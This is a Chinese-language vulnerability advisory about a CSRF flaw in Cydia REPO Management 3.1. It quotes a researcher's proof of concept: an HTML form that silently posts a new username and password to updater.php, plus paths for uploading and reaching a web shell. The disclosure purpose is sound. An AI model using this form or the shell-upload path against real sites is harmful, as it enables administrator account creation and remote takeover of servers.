发布日期：2013-01-17
更新日期：2013-01-21

受影响系统：

damarist Cydia REPO Management 3.1

描述：

---

Cydia REPO Management 3.1及其他版本内存在安全漏洞，允许用户通过HTTP请求执行某些操作，而不验证这些请求。如果已登录的管理员浏览了恶意网站，可能会被利用进行恶意操作，如添加一个新用户等。

<*来源：cr4wl3r
  
  链接：http://secunia.com/advisories/51843/
        http://bastardlabs.info/exploits/Cydia_Repo_Manager.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

cr4wl3r （）提供了如下测试方法：
# Cydia Repo Manager CSRF Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Cydia_Repo_Manager.txt
# Software Link: http://damarist.de/?lang=en
# Download : http://damar1st.de/downloads/CydiaRepoManager3.1.zip
# Tested: Win 7

Proof of concept:

<form method="post" action="http://bastardlabs/[CydiaRepoManager_path]/debs/updater.php">
<input type="text" name="user" value="Username"/> <br />
<input type="text" name="pass" value="Password"/><br />
<input type="submit" name="s" value="w00tw00t!" />
</form>


Login :  http://bastardlabs/[CydiaRepoManager_path]/index.php

Upload Shell : http://bastardlabs/[CydiaRepoManager_path]/deb.php

Shell : http://bastardlabs/[CydiaRepoManager_path]/downloads/shell.php


Demo :
http://bastardlabs.info/demo/CydiaRepoManager1.png
http://bastardlabs.info/demo/CydiaRepoManager2.png
http://bastardlabs.info/demo/CydiaRepoManager3.png

建议：

---

厂商补丁：

damarist
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://damar1st.de/downloads/CydiaRepoManager3.1.zip

浏览次数：4377
严重程度：0（网友投票）